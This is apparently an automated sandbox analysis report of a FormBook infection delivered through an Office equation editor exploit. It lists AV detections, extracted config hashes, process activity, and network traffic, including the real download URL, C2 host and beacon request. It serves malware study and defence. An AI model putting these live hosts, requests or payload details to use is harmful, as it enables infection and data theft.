Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2408, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mpomabiva[1].exe

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mpomabiva[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1106536
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Avira: detection malicious, Label: HEUR/AGEN.1106536

Found malware configuration

Show sources

Source: 4.2.mpomboby8423.exe.280000.1.unpack

Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc6", "KEY1_OFFSET 0x1d70c", "CONFIG SIZE : 0xf1", "CONFIG OFFSET 0x1d80b", "URL SIZE : 32", "searching string pattern", "strings_offset 0x1c373", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa76d1436", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f71503e", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e2", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01449", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mpomabiva[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	ReversingLabs: Detection: 36%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2363397604.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2136966268.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2137046396.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2104089442.0000000000280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2363479849.0000000000250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.mpomboby8423.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mpomboby8423.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpomboby8423.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpomboby8423.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mpomabiva[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Joe Sandbox ML: detected

Source: 4.2.mpomboby8423.exe.280000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.mpomboby8423.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\user\AppData\Roaming\mpomboby8423.exe

Jump to behavior

Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: mpomboby8423.exe, help.exe
Source:	Binary string: help.pdb source: mpomboby8423.exe, 00000005.00000002.2137106093.0000000000534000.00000004.00000020.sdmp

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 4x nop then pop edi	5_2_00416CBE
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 4x nop then pop edi	5_2_00417D89
Source: C:\Windows\SysWOW64\help.exe	Code function: 4x nop then pop edi	7_2_00096CBE
Source: C:\Windows\SysWOW64\help.exe	Code function: 4x nop then pop edi	7_2_00097D89

Source: global traffic

DNS query: name: vm1662026.3ssd.had.wf

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 92.119.114.220:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 92.119.114.220:80

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 13 Jan 2021 19:37:14 GMTContent-Type: application/octet-streamContent-Length: 333824Last-Modified: Wed, 13 Jan 2021 12:17:39 GMTConnection: keep-aliveKeep-Alive: timeout=60ETag: "5ffee4e3-51800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2e 90 03 74 6a f1 6d 27 6a f1 6d 27 6a f1 6d 27 f4 51 aa 27 6b f1 6d 27 ae 34 a2 27 49 f1 6d 27 ae 34 a0 27 72 f1 6d 27 ae 34 a3 27 e2 f1 6d 27 6a f1 6c 27 1e f1 6d 27 96 86 d4 27 7f f1 6d 27 4d 37 a3 27 6b f1 6d 27 4d 37 a4 27 6b f1 6d 27 4d 37 a1 27 6b f1 6d 27 52 69 63 68 6a f1 6d 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 45 ce fe 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 6e 01 00 00 ec 00 00 00 00 00 00 a7 88 00 00 00 10 00 00 00 80 01 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 02 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 db 01 00 dc 00 00 00 00 50 02 00 78 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 02 00 50 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 d6 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9a 6d 01 00 00 10 00 00 00 6e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f8 64 00 00 00 80 01 00 00 66 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 50 00 00 00 f0 01 00 00 34 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 1a 00 00 00 50 02 00 00 1c 00 00 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 17 00 00 00 70 02 00 00 18 00 00 00 28 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET /iic6/?Cr24w=dZrXWrr0J06LhDJ&UL0tljxP=LfZLOLN5XSNEI+sCgvR59RXQ9jmNrQ0h0keI8mxtmC8z/BE1pdL/TKWDQE351dcf8yE5vQ== HTTP/1.1Host: www.ghelyoun.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 91.195.240.94 91.195.240.94

Source: Joe Sandbox View	ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
Source: Joe Sandbox View	ASN Name: SEDO-ASDE SEDO-ASDE

Source: global traffic

HTTP traffic detected: GET /mpomabiva.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: vm1662026.3ssd.had.wfConnection: Keep-Alive

Source: C:\Windows\explorer.exe

Code function: 6_2_029767A2 getaddrinfo,setsockopt,recv,

6_2_029767A2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1E842130-90B9-4F45-8DA5-C9F08E2C2850}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /mpomabiva.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: vm1662026.3ssd.had.wfConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /iic6/?Cr24w=dZrXWrr0J06LhDJ&UL0tljxP=LfZLOLN5XSNEI+sCgvR59RXQ9jmNrQ0h0keI8mxtmC8z/BE1pdL/TKWDQE351dcf8yE5vQ== HTTP/1.1Host: www.ghelyoun.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: mpomboby8423.exe, 00000004.00000002.2104552065.0000000000B30000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2113776918.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: vm1662026.3ssd.had.wf

Source: explorer.exe, 00000006.00000000.2126479275.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2126479275.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2116151786.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: mpomboby8423.exe, 00000004.00000002.2104552065.0000000000B30000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2113776918.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: mpomboby8423.exe, 00000004.00000002.2104552065.0000000000B30000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2113776918.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: mpomboby8423.exe, 00000004.00000002.2104829039.0000000000D17000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2114936795.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: mpomboby8423.exe, 00000004.00000002.2104829039.0000000000D17000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2114936795.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000006.00000002.2363837928.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
